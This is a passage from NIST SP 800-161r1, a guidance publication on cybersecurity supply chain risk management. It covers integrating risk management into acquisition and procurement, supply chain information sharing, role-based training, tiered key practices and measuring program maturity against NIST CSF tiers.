with peers to exchange C-SCRM insights. These insights will aid enterprises in continuously
evaluating how well they are doing and identify where they need to improve and how to take
steps to mature their C-SCRM program. This section addresses the requisite enterprise processes
and capabilities in making C-SCRM successful. While this publication has chosen to highlight
these critical success factors, this represents a non-exhaustive set of factors that contribute to an
enterprise’s successful execution of C-SCRM. Critical success factors are fluid and will evolve
over time as the environment and the enterprise’s own capability advances.
3.1.
C-SCRM in Acquisition25
Integrating C-SCRM considerations into acquisition activities within every step of the
procurement and contract management life cycle process is essential to improving management
of cybersecurity risks throughout the supply chain. This life cycle begins with a purchaser
identifying a need and includes the processes to plan for and articulate requirements, conduct
research to identify and assess viable sources of supply, solicit bids, evaluate offers to ensure
conformance with C-SCRM requirements, and assess C-SCRM risks associated with the bidder
and the proposed product and/or service. After contract award, ensure that the supplier satisfies
the terms and conditions articulated in the contractual agreement and that the products and
services conform as expected and required. Monitoring for changes that may affect cybersecurity
risks in the supply chain should occur throughout the life cycle and may trigger reevaluation of
the original assessment or require a mitigation response.
Enterprises rely heavily on commercial products and outsourced services to perform operations
and fulfill their mission and business objectives. However, it is important to highlight that
products and services can also be obtained outside of the procurement process, as is the case with
open source software, relying on an in-house provider for shared services, or by repurposing an
existing product to satisfy a new need. C-SCRM must also be addressed for these other
“acquiring” processes.
In addition to addressing cybersecurity risks throughout the supply chain and performing C-
SCRM activities during each phase of the acquisition process, enterprises should develop and
execute an acquisition strategy that drives reductions in their overall risk exposure. By applying
such strategies, enterprises can reduce cybersecurity risks throughout the supply chain, within
specific procurement processes, and for the overall enterprise. Enterprises will aid, direct, and
25 Departments and agencies should refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
38
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
inform efforts to realize targeted risk-reducing outcomes by adopting acquisition policies and
processes that integrate C-SCRM into acquisition activities.
Additionally, by adopting C-SCRM controls aligned to an industry-recognized set of standards
and guidelines (e.g., NIST 800-53, Rev.5; NIST CSF), the enterprise can ensure holistic
coverage of cybersecurity risks throughout the supply chain and corresponding C-SCRM
practices. C-SCRM controls may apply to different participants of the supply chain to include the
enterprise itself, prime contractors, and subcontractors. Because enterprises heavily rely on prime
contractors and their subcontractors to develop and implement ICT/OT products and services,
those controls implemented within the SDLC are likely to flow down to subcontractors.
Establishing C-SCRM controls applicable throughout the supply chain and the SDLC will aid the
enterprise in establishing a common lexicon and set of expectations with suppliers and sub-
suppliers to aid all participants in managing cybersecurity risks throughout the supply chain.
3.1.1. Acquisition in the C-SCRM Strategy and Implementation Plan
An enterprise’s C-SCRM Strategy and Implementation Plan guides the enterprise toward the
achievement of long-term, sustainable reductions in exposure to cybersecurity risks throughout
the supply chain. As a core part of the C-SCRM Strategy and Implementation Plan, enterprises
should address how this risk is managed throughout the acquisition process.
Cybersecurity risks in the supply chain include those arising from the supplier’s enterprise,
products, services, and the supplier’s own suppliers and supply chains. The C-SCRM PMO may
be helpful in developing specific strategies and implementation plans for integrating C-SCRM
considerations into acquisitions. Acquisition activities relevant to C-SCRM include:
• Promoting awareness and communicating C-SCRM expectations as part of supplier
relationship management efforts
• Establishing a checklist of acquisition security requirements that must be completed as
part of procurement requests to ensure that necessary provision and protections are in
place
• Leveraging an external shared service provider or utilizing the C-SCRM PMO to provide
supplier, product, and/or service assessment activities as a shared service to other internal
processes, including acquisition
• Conducting due diligence to inform determinations about a bidder’s responsibility and to
identify and assess bidders’ risk posture or risk associated with a given product or service
• Obtaining open source software from vetted and approved libraries
• Including C-SCRM criteria in source selection evaluations
• Establishing and referencing a list of prohibited suppliers, if appropriate, per applicable
regulatory and legal references
• Establishing and procuring from an approved products list or list of preferred or qualified
suppliers who have demonstrated conformance with the enterprise’s security
requirements through a rigorous process defined by the enterprise or another acceptable
qualified list program activity [CISA SCRM WG3]
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
39
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
• Ensuring that products, including software or logic-bearing products (i.e., hardware), are
supplied with a software bill of materials that complies with appropriate agency-approved
protocols
The C-SCRM Strategy and Implementation Plan should address the acquisition security-relevant
foundational elements necessary to implement a C-SCRM program. To support the strategy,
enterprise leaders should promote the value and importance of C-SCRM within acquisitions and
ensure that sufficient, dedicated funding is in place for necessary activities. Doing so will help
enterprises ensure responsibility for program or business processes and accountability for
progress toward the attainment of results. Enterprises should build sufficient time into
acquisition and project activities to ensure that C-SCRM activities can be completed. Enterprises
should also assign roles and responsibilities, some of which will be cross-enterprise in nature and
team-based, while others will be specific to acquisition processes. Finally, relevant training
should be provided to members of the acquisition workforce to ensure that roles and
responsibilities are understood and executed in alignment with leader expectations.
The enterprise’s capabilities, resources, operational constraints, and existing portfolio of supplier
relationships, contracts, acquired services, and products provide the baseline context necessary to
lay out a strategic path that is both realistic and achievable. This baseline starting point also
serves as a marker by which performance progress and outcomes can be tracked and assessed.
A critical first step is to ensure that there is a current and accurate inventory of the enterprise’s
supplier relationships, contracts, and any products or services those suppliers provide. This
information allows for a mapping of these suppliers into strategically relevant groupings as
determined by the organization. For example, an assessment of these suppliers might result in
groupings of multiple categories (e.g., “strategic/innovative,” “mission-critical,” “sustaining,” or
“standard/non-essential”). This segmentation facilitates further analysis and understanding of the
exposure to cybersecurity risks throughout the supply chain and helps to focus attention and
assign priority to those critical suppliers of the most strategic or operational importance to the
enterprise and its mission and business processes. It is useful to identify which products and
services require a higher level of confidence in risk mitigation and areas of risk, such as
overreliance on a single source of supply. This inventory and mapping also facilitates the
selection and tailoring of C-SCRM contract language and evaluation criteria.
Additional information can be found in Appendix A of this document, [NISTIR 8179], and SA-1,
SA-2, SA-4, SR-5, SR-13 of NIST SP 800-53, Rev. 5.
3.1.2. The Role of C-SCRM in the Acquisition Process
When conducting a procurement, enterprises should designate experts from different subject
matter areas to participate in the acquisition process as members of the Acquisition Team and/or
Integrated Project Team.26 This includes program officials, personnel with technical and security
expertise, and representatives from supply and procurement communities. While procurement
requirements address and are tailored to a specific purpose and ensuring that compliance
mandates are met, contextual factors such as mission criticality, the sensitivity of data, and the
26 An Integrated Project Team is equivalent to the acquisition team, as defined by the FAR
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
40
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
operational environment must also be considered to effectively address cybersecurity risk in
supply chains.
This contextual basis sets the stage for the Acquisition Team to effectively gauge their tolerance
for risk as it pertains to a specific procurement requirement and determine which of the C-SCRM
controls described in this document and [NIST SP 800-53 Rev 5] controls are relevant and
necessary to consider for specific acquisitions. The program office or requiring official should
consult with information security personnel to complete this control selection process and work
with their procurement official to incorporate these controls into requirements documents and
contracts. Security is a critical factor in procurement decisions. For this reason, when purchasing
ICT/OT-related products or services, enterprises should avoid using a “lowest price, technically
acceptable” (LPTA) source selection process.
Acquisition policies and processes need to incorporate C-SCRM considerations into each step of
the procurement and contract management life cycle management process (i.e., plan
procurement, define and develop requirements, perform market analysis, complete procurement,
ensure compliance, and monitor performance for changes that affect C-SCRM risk status) as
described in [NISTIR 7622]. This includes ensuring that cybersecurity risks throughout the
supply chain are addressed when making ICT/OT-related charge card purchases.
During the ‘plan procurement’ step, the need for and the criticality of the good or service to be
procured needs to be identified, along with a description of the factors driving the determination
of the need and level of criticality as this informs how much risk may be tolerated, who should
be involved in the planning, and the development of the specific requirements that will need to
be satisfied. This activity is typically led by the acquirer mission and business process owner or a
designee in collaboration with the procurement official or contracting officer representative
During the planning phase, the enterprise should develop and define requirements to address
cybersecurity risks throughout the supply chain in addition to specifying performance, schedule,
and cost objectives. This process is typically initiated by the acquirer mission and business
process owner or a designee in collaboration with the procurement official and other members of
the C-SCRM team.
With requirements defined, enterprises will typically complete a market analysis for potential
suppliers. Market research and analysis activities explore the availability of potential or pre-
qualified sources of supply. This step is typically initiated by the acquirer mission and business
process owner or a designated representative. Enterprises should use this phase to conduct more
robust due diligence research on potential suppliers and/or products in order to generate a
supplier risk profile. As part of due diligence, the enterprise may consider the market
concentration for the sought-after product or service as a means of identifying interdependencies
within the supply chain. The enterprise may also use a request for information (RFIs), sources
sought notice (SSNs), and/or due diligence questionnaires for the initial screening and collection
of evidence from potential suppliers. Enterprises should not treat the initial C-SCRM due
diligence risk assessment as exhaustive. Results of this research can also be helpful in shaping
the sourcing approach and refining requirements.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
41
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Finally, the enterprise will complete the procurement step by releasing a statement of work
(SOW), performance work statement (PWS), or statement of objective (SOO) for the release of a
request for proposal (RFP) or request for quotes (RFQ). Any bidders responding to the RFP or
RFQ should be evaluated against relevant, critical C-SCRM criteria. The RFP review process
should also include any procurement-specific supplier risk assessment. The assessment criteria
will be heavily informed by the defined C-SCRM requirements and include coverage over but
not limited to information about the enterprise, its security processes, and its security track
record. The response review process involves multiple C-SCRM stakeholders, including
procurement, the mission and business process owner, appropriate information system owners,
and technical experts. Prior to purchase, enterprises should identify and assess the quality of the
product or system components, vulnerability(s) authenticity, and other relevant cybersecurity-
supply chain risk factors and complete this risk assessment prior to deployment.
Once the contract is executed, the enterprise should monitor for changes that alter its exposure to
cybersecurity risks throughout the supply chain. Such changes may include internal enterprise or
system changes, supplier operational or structural changes, product updates, and geopolitical or
environmental changes. Contracts should include provisions that provide grounds for termination
in cases where there are changes to cybersecurity supply chain risk that cannot be adequately
mitigated to within acceptable levels. Finally, enterprises should continuously apply lessons
learned and collected during the acquisition process to enhance their ability to assess, respond to,
and monitor cybersecurity risks throughout the supply chain.
Table 3-1 shows a summary of where C-SCRM assessments may take place within the various
steps of the procurement process.
Table 3-1: C-SCRM in the Procurement Process
Procurement
Process
Service Risk
Assessment
Supplier Risk
Assessment
Product Risk
Assessment
Plan Procurement
Service Risk
Assessment Criticality
of Needed Service
Other Context
(functions performed;
access to systems/data,
etc.) Fit for Purpose
Fit for Purpose
Criticality of Needed
Product Other Context
(Operating
Environment, Data,
Users, etc.) Fit for
Purpose
Define or Develop
Requirements
Identify relevant C-
SCRM controls or
requirements
Identify relevant C-
SCRM controls or
requirements
Identify relevant C-
SCRM controls or
requirements
Perform Market
Analysis
Initial Risk Assessment
(e.g., due diligence
questionnaires)
Initial Risk Assessment
(e.g., due diligence
questionnaires)
Research product
options and risk factors
Solicit Bids/
Complete
Procurement
Confirm C-SCRM
Requirements Met
Complete Risk
Assessment
Confirm C-SCRM
Requirements Met
Complete Risk
Assessment
Pre-deployment Risk
Assessment
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
42
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Procurement
Process
Service Risk
Assessment
Supplier Risk
Assessment
Product Risk
Assessment
Operate and
Maintain
Continuous Risk
Monitoring
Continuous Risk
Monitoring
Continuous Risk
Monitoring
In addition to process activities, there are many useful acquisition security-enhancing tools and
techniques available, including obscuring the system end use or system component, using blind
or filtered buys, requiring tamper-evident packaging, or using trusted or controlled distribution.
The results of a supply chain cybersecurity risk assessment can guide and inform the strategies,
tools, and methods that are most applicable to the situation. Tools, techniques, and practices may
provide protections against unauthorized production, theft, tampering, insertion of counterfeits,
insertion of malicious software or backdoors, and poor development practices throughout the
system development life cycle.
To ensure the effective and continued management of cybersecurity risks across the supply chain
and throughout the acquisition life cycle, contractual agreements and contract management
should include:
•
The satisfaction of applicable security requirements in contracts and mechanisms as a
qualifying condition for award;
•
Flow-down control requirements to subcontractors, if and when applicable, including C-
SCRM performance objectives linked to the method of inspection in a Quality Assurance
Surveillance Plan or equivalent method for monitoring performance;
•
The periodic revalidation of supplier adherence to security requirements to ensure continual
compliance;
•
Processes and protocols for communication and the reporting of information about
vulnerabilities, incidents, and other business disruptions, including acceptable deviations if
the business disruption is deemed serious and baseline criteria to determine whether a
disruption qualifies as serious; and
•
Terms and conditions that address the government, supplier, and other applicable third-
party roles, responsibilities, and actions for responding to identified supply chain risks or
risk incidents in order to mitigate risk exposure, minimize harm, and support timely
corrective action or recovery from an incident.
There are a variety of acceptable validation and revalidation methods, such as requisite
certifications, site visits, third-party assessments, or self-attestation. The type and rigor of the
required methods should be commensurate with the criticality of the service or product being
acquired and the corresponding assurance requirements.
Additional guidance for integrating C-SCRM into the acquisition process is provided in
Appendix C, which demonstrates the enhanced overlay of C-SCRM into the [NIST SP 800-39]
Risk Management Process. In addition, enterprises should refer to and follow the acquisition and
procurement policies, regulations, and best practices that are specific to their domain (e.g.,
critical infrastructure sector, state government, etc.).
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
43
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Additional information can be found in Appendix A of this document and SA-1, SA-2, SA-3, SA-4,
SA-9, SA-19, SA-20, SA-22, SR-5, SR-6, SR-10, and SR-11 of NIST SP 800-53, Rev. 5.
3.2.
Supply Chain Information Sharing
Enterprises are continuously exposed to risk originating from their supply chains. An effective
information-sharing process helps to ensure that enterprises can gain access to information that is
critical to understanding and mitigating cybersecurity risks throughout the supply chain and also
share relevant information with others that may benefit from or require awareness of these risks.
To aid in identifying, assessing, monitoring, and responding to cybersecurity risks throughout the
supply chain, enterprises should build information-sharing processes and activities into their C-
SCRM programs. This may include establishing information-sharing agreements with peer
enterprises, business partners, and suppliers. By exchanging Supply Chain Risk Information
(SCRI) within a sharing community, enterprises can leverage the collective knowledge,
experience, and capabilities of that sharing community to gain a more complete understanding of
the threats that the enterprise may face. Additionally, the sharing of SCRI allows enterprises to
better detect campaigns that target specific industry sectors and institutions. However, the
enterprise should be sure that information sharing occurs through formal sharing structures, such
as Information Sharing and Analysis Centers (ISACs). Informal or unmanaged information
sharing can expose enterprises to potential legal risks.
Federal enterprises should establish processes to effectively engage with the FASC’s
information-sharing agency, which is responsible for facilitating information sharing among
government agencies and acting as a central, government-wide facilitator for C-SCRM
information-sharing activities.
NIST SP 800-150 describes key practices for establishing and participating in SCRI-sharing
relationships, including:
• Establish information-sharing goals and objectives that support business processes and
security policies
• Identify existing internal sources of SCRI
• Specify the scope of information-sharing activities27
• Establish information-sharing rules
• Join and participate in information-sharing efforts
• Actively seek to enrich indicators by providing additional context, corrections, or
suggested improvements
• Use secure, automated workflows to publish, consume, analyze, and act upon SCRI
• Proactively establish SCRI-sharing agreements
• Protect the security and privacy of sensitive information
27 The scope of information sharing activities should include the data classification level that was approved at the most recent risk assessment for
a supplier and the data types that were approved for that supplier. For example, if an assessment was performed for data at a certain classification
level (e.g., Business Confidential) and the scope of the engagement changes to include data at a new classification level (e.g., restricted), the risk
assessment needs to be refreshed.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
44
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
• Provide ongoing support for information-sharing activities
As shown in Table 3-2, below, SCRI describes or identifies the cybersecurity supply chain
relevant characteristics and risk factors associated with a product, service, or source of supply. It
may exist in various forms (e.g., raw data, a supply chain network map, risk assessment report,
etc.) and should be accompanied by the metadata that will facilitate an assessment of a level of
confidence in and credibility of the information. Enterprises should follow established processes
and procedures that describe whether and when the sharing or reporting of certain information is
mandated or voluntary and if there are any necessary requirements to adhere to regarding
information handling, protection, and classification.
Table 3-2: Supply Chain Characteristics and Cybersecurity Risk Factors Associated with a
Product, Service, or Source of Supply28
Source of Supply, Product, or Service
Characteristics
Risk Indicators, Analysis, and Findings
• Features and functionality
• Access to data and information,
including system privileges
• Installation or operating environment
• Security, authenticity, and integrity of a
given product or service and the
associated supply and compilation chain
• The ability of the source to produce and
deliver a product or service as expected
• Foreign control of or influence over the
source (e.g., foreign ownership, personal
and professional ties between the source
and any foreign entity, legal regime of
any foreign country in which the source
is headquartered or conducts
operations)29
• Market alternatives to the source
• Provenance and pedigree of components
• Supply chain relationships and locations
• Threat information includes indicators
(system artifacts or observables
associated with an attack), tactics,
techniques, and procedures (TTPs)
• Security alerts or threat intelligence
reports
• Implications to national security,
homeland security, national critical
infrastructure, or the processes
associated with the use of the product
or service
• Vulnerability of federal systems,
programs, or facilities
• Threat level and vulnerability level
assessment/score
• Potential impact or harm caused by the
possible loss, damage, or compromise
of a product, material, or service to an
enterprise’s operations or mission and
the likelihood of a potential impact,
harm, or the exploitability of a system
• The capacity to mitigate risks is
identified
28 Supply Chain Characteristics and Cybersecurity Risk Factors Associated with a Product, Service, or Source of Supply is non-exhaustive.
29 Special 301 Report, prepared annually by the Office of the United States Trade Representative (USTR), provides supplemental guidance for
intellectual property handling (https://ustr.gov/issue-areas/intellectual-property/special-301).
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
45
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
• Potential risk factors, such as
geopolitical, legal, managerial/internal
controls, financial stability, cyber
incidents, personal and physical
security, or any other information that
would factor into an analysis of the
security, safety, integrity, resilience,
reliability, quality, trustworthiness, or
authenticity of a product, service, or
source
3.3.
C-SCRM Training and Awareness
Numerous individuals within the enterprise contribute to the success of C-SCRM. These may
include information security, procurement, risk management, engineering, software
development, IT, legal, HR, and program managers. Examples of these groups’ contributions
include:
• System Owners are responsible for multiple facets of C-SCRM at the operational level as
part of their responsibility for the development, procurement, integration, modification,
operation, maintenance, and/or final disposition of an information system.
• Human Resources defines and implements background checks and training policies,
which help ensure that individuals are trained in appropriate C-SCRM processes and
procedures.
• Legal helps draft or review C-SCRM-specific contractual language that is included by
procurement in contracts with suppliers, developers, system integrators, external system
service providers, and other ICT/OT-related service providers.
• Acquisition/procurement defines the process for implementing supplier assurance
practices embedded in the acquisition process.
• Engineering designs products and must understand existing requirements for the use of
open source components.
• Software developers ensure that software weaknesses and vulnerabilities are identified
and addressed as early as possible, including testing and fixing code.
• Shipping and receiving ensures that boxes containing critical components have not been
tampered with en route or at the warehouse.
• Project managers ensure that project plans are developed and include C-SCRM
considerations as part of the project plan and execution.
Everyone within an enterprise, including the end users of information systems, has a role in
managing cybersecurity risks throughout the supply chain. The enterprise should foster an
overall culture of security that includes C-SCRM as an integral part. The enterprise can use a
variety of communication methods to foster the culture, of which traditional awareness and role-
based training are only one component.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
46
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Every individual within an enterprise should receive appropriate training to enable them to
understand the importance of C-SCRM to their enterprise, their specific roles and
responsibilities, and as it relates to processes and procedures for reporting incidents. This
training can be integrated into the overall cybersecurity awareness training. Enterprises should
define baseline training requirements at a broad scope within Level 1, and those requirements
should be tailored and refined based on the specific context within Level 2 and Level 3.
Those individuals who have more significant roles in managing cybersecurity risks throughout
the supply chain should receive tailored C-SCRM training that helps them understand the scope
of their responsibilities, the specific processes and procedure implementations for which they are
responsible, and the actions to take in the event of an incident, disruption, or another C-SCRM-
related event. The enterprises should establish specific role-based training criteria and develop
role-specific C-SCRM training to address C-SCRM roles and responsibilities. The enterprise
may also consider adding C-SCRM content into preexisting role-based training for some specific
roles. Refer to the Awareness and Training controls in Section 4.5 for more detail.
Enterprises are encouraged to utilize the NIST National Initiative for Cybersecurity Education
(NICE) Framework30 as a means of forming a common lexicon for C-SCRM workforce topics.
This will aid enterprises in developing training linked to role-specific C-SCRM responsibilities
and communicating cybersecurity workforce-related topics. The NICE Framework outlines
Categories; Specialty Areas; Work Roles; Knowledge, Skills, and Abilities (KSAs); and Tasks
that describe cybersecurity work.
3.4.
C-SCRM Key Practices31
Cybersecurity supply chain risk management builds on existing standardized practices in
multiple disciplines and an ever-evolving set of C-SCRM capabilities. C-SCRM Key Practices
are meant to specifically emphasize and draw attention to a subset of the C-SCRM practices
described throughout this publication. Enterprises should prioritize achieving a base-level of
maturity in these key practices prior to advancing on to additional C-SCRM capabilities.
Enterprises should tailor their implementation of these practices to what is applicable and
appropriate given their unique context (e.g., based on available resources and risk profile). C-
SCRM Key Practices are described in NIST standards and guidelines, such as [NISTIR 8276],
and other applicable national and international standards. C-SCRM Practices include integrating
C-SCRM across the enterprise; establishing a formal program; knowing and managing critical
products, services, and suppliers; understanding an enterprise’s supply chain; closely
collaborating with critical suppliers; including critical suppliers in resilience and improvement
activities; assessing and monitoring throughout the supplier relationship; and planning for the
full life cycle.
30 See NIST SP 800-181, National Initiative for Cybersecurity Education (NICE) Cybersecurity Workforce Framework.
31 Departments and agencies should refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
47
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
3.4.1. Foundational Practices
Having foundational practices in place is critical to successfully and productively interacting
with system integrators. Suppliers may be at varying levels with regard to having the
standardized practices in place. The following are specific examples of the recommended
multidisciplinary foundational practices that can be incrementally implemented to improve an
enterprise’s ability to develop and execute more advanced C-SCRM practices:
• Establish a core, dedicated, multidisciplinary C-SCRM Program Management Office
and/or C-SCRM team.
• Obtain senior leadership support for establishing and/or enhancing C-SCRM.
• Implement a risk management hierarchy and risk management process (in accordance
with NIST SP 800-39, Managing Information Security Risk [NIST SP 800-39]),
including an enterprise-wide risk assessment process (in accordance with NIST SP 800-
30, Rev. 1, Guide for Conducting Risk Assessments [NIST SP 800-30 Rev. 1]).
• Establish an enterprise governance structure that integrates C-SCRM requirements and
incorporates these requirements into the enterprise policies.
• Develop a process for identifying and measuring the criticality of the enterprise’s
suppliers, products, and services.
• Raise awareness and foster understanding of what C-SCRM is and why it is critically
important.
• Develop and/or integrate C-SCRM into acquisition/procurement policies and procedures
(including Federal Information Technology Acquisition Reform Act [FITARA]
processes, applicable to federal agencies) and purchase card processes. Supervisors and
managers should also ensure that their staff aims to build C-SCRM competencies.
• Establish consistent, well-documented, repeatable processes for determining Federal
Information Processing Standards (FIPS) 199 impact levels.
• Establish and begin using supplier risk-assessment processes on a prioritized basis
(inclusive of criticality analysis, threat analysis, and vulnerability analysis) after the
[FIPS 199] impact level has been defined.
• Implement a quality and reliability program that includes quality assurance and quality
control process and practices.
• Establish explicit collaborative and discipline-specific roles, accountabilities, structures,
and processes for supply chain, cybersecurity, product security, physical security, and
other relevant processes (e.g., Legal, Risk Executive, HR, Finance, Enterprise IT,
Program Management/System Engineering, Information Security,
Acquisition/Procurement, Supply Chain Logistics, etc.).
• Ensure that adequate resources are dedicated and allocated to information security and C-
SCRM to ensure proper implementation of policy, guidance, and controls.
• Ensure sufficient cleared personnel with key C-SCRM roles and responsibilities to access
and share C-SCRM-related classified information.
• Implement an appropriate and tailored set of baseline information security controls found
in NIST SP 800-53, Revision 5, Security and Privacy Controls for Information Systems
and Enterprises [NIST SP 800-53, Rev. 5].
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
48
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
• Establish internal checks and balances to ensure compliance with security and quality
requirements.
• Establish a supplier management program that includes, for example, guidelines for
purchasing from qualified original equipment manufacturers (OEMs)32 or their
authorized distributors and resellers.
• Implement a robust incident management program to successfully identify, respond to,
and mitigate security incidents. This program should be capable of identifying the root
cause of security incidents, including those that originate from the cybersecurity supply
chain.
• Establish internal processes to validate that suppliers and service providers actively
identify and disclose vulnerabilities in their products.
• Establish a governance capability for managing and monitoring components of embedded
software to manage risk across the enterprise (e.g., SBOMs paired with criticality,
vulnerability, threat, and exploitability to make this more automated).
3.4.2. Sustaining Practices
Sustaining practices should be used to enhance the efficacy of cybersecurity supply chain risk
management. These practices are inclusive of and build upon foundational practices. Enterprises
that have broadly standardized and implemented the foundational practices should consider these
as the next steps in advancing their cybersecurity supply chain risk management capabilities:
• Establish and collaborate with a threat-informed security program.
• Use confidence-building mechanisms, such as third-party assessment surveys, on-site
visits, and formal certifications (e.g., ISO 27001) to assess critical supplier security
capabilities and practices.
• Establish formal processes and intervals for continuous monitoring and reassessment of
suppliers, supplied products and services, and the supply chain itself for potential changes
to the risk profile.
• Use the enterprise’s understanding of its C-SCRM risk profile (or risk profiles specific to
mission and business areas) to define a risk appetite and risk tolerances to empower
leaders with delegated authority across the enterprise to make C-SCRM decisions in
alignment with the enterprise’s mission imperatives and strategic goals and objectives.
• Use a formalized information-sharing function to engage with ISACs, the FASC, and
other government agencies to enhance the enterprise’s supply chain cybersecurity threat
and risk insights and help ensure a coordinated and holistic approach to addressing
cybersecurity risks throughout the supply chain that may affect a broader set of agencies,
the private sector, or national security.
• Coordinate with the enterprise’s cybersecurity program leadership to elevate top C-
SCRM Risk Profile risks to the most senior enterprise risk committee.
• Embed C-SCRM-specific training into the training curriculums of applicable roles across
the enterprise processes involved with C-SCRM, including information security,
procurement, risk management, engineering, software development, IT, legal, and HR.
32 For purposes of this publication, the term original equipment manufacturers is inclusive of original component manufacturers.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
49
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
• Integrate C-SCRM considerations into every aspect of the system and product life cycle,
and implement consistent, well-documented, repeatable processes for systems
engineering, cybersecurity practices, and acquisition.
• Integrate the enterprise’s defined C-SCRM requirements into the contractual language
found in agreements with suppliers, developers, system integrators, external system
service providers, and other ICT/OT-related service providers.
• Include critical suppliers in contingency planning, incident response, and disaster
recovery planning and testing.
• Engage with suppliers, developers, system integrators, external system service providers,
and other ICT/OT-related service providers to improve their cybersecurity practices.
• Define, collect, and report C-SCRM metrics to ensure risk-aware leadership, enable
active management of the completeness of C-SCRM implementations, and drive the
efficacy of the enterprise’s C-SCRM processes and practices.
3.4.3. Enhancing Practices
Enhancing practices should be applied by the enterprise with the goal of advancing toward
adaptive and predictive C-SCRM capabilities. Enterprises should pursue these practices once
sustaining practices have been broadly implemented and standardized across the enterprise:
• Automate C-SCRM processes where applicable and practical to drive execution
consistency, efficiency, and make available the critical resources required for other
critical C-SCRM activities.
• Adopt quantitative risk analyses that apply probabilistic approaches (e.g., Bayesian
analysis) to reduce uncertainty about the likelihood and impact of cybersecurity risks
throughout the supply chain, optimize the allocation of resources to risk response, and
measure return on investment (i.e., response effectiveness).
• Apply insights gained from leading C-SCRM metrics (i.e., forward-looking indicators) to
shift from reactive to predictive C-SCRM strategies and plans that adapt to risk profile
changes before they occur.
• Establish or participate in a community of practice (e.g., Center of Excellence) as
appropriate to enhance and improve C-SCRM practices.
The guidance and controls contained in this publication are built on existing multidisciplinary
practices and are intended to increase the ability of enterprises to strategically manage
cybersecurity risks throughout the supply chain over the entire life cycle of systems, products,
and services. Refer to Table 3-3 for a summary of C-SCRM key practices.
3.5.
Capability Implementation Measurement and C-SCRM Measures
Enterprises should actively manage the efficiency and effectiveness of their C-SCRM programs
through ongoing measurement of the programs themselves. Enterprises can use several methods
to measure and manage the effectiveness of their C-SCRM program:
• Using a framework, such as NIST CSF to assess their C-SCRM capabilities
• Measuring the progress of their C-SCRM initiatives toward completion
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
50
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
• Measuring the performance of their C-SCRM initiatives toward desired outcomes
All methods rely on a variety of data collection, analysis, contextualization, and reporting
activities. Collectively, these methods should be used to track and report progress and results that
ultimately indicate reductions in risk exposure and improvements in the enterprise’s security
outcomes.
C-SCRM performance management provides multiple enterprise and financial benefits. Major
benefits include increasing stakeholder accountability for C-SCRM performance; improving the
effectiveness of C-SCRM activities; demonstrating compliance with laws, rules, and regulations;
providing quantifiable inputs for resource allocation decisions; and cost-avoidance associated
with reduced impact from or the likelihood of experiencing a cyber supply chain incident.
Enterprises can use a framework to baseline their C-SCRM capabilities, such as NIST CSF
Implementation Tiers, which provide a useful context for an enterprise to track and gauge the
increasing rigor and sophistication of their C-SCRM practices. Progression against framework
topics is measured using ordinal (i.e., 1-5) scales that illustrate the progression of capabilities
across tiers. The following are examples of how C-SCRM capabilities could be gauged by
applying NIST CSF Tiers:
• CSF Tier 1: The enterprise does not understand its exposure to cybersecurity risks
throughout the supply chain or its role in the larger ecosystem. The enterprise does not
collaborate with other entities or have processes in place to identify, assess, and mitigate
cybersecurity risks throughout the supply chain.
• CSF Tier 2: The enterprise understands its cybersecurity risks throughout the supply
chain and its role in the larger ecosystem. The enterprise has not internally formalized its
capabilities to manage cybersecurity risks throughout the supply chain or its capability to
engage and share information with entities in the broader ecosystem.
• CSF Tier 3: The enterprise-wide approach to managing cybersecurity risks throughout
the supply chain is enacted via enterprise risk management policies, processes, and
procedures. This likely includes a governance structure (e.g., Risk Council) that balances
the management of cybersecurity risks throughout the supply chain with other enterprise
risks. Policies, processes, and procedures are consistently implemented as intended and
continuously monitored and reviewed. Personnel possess the knowledge and skills to
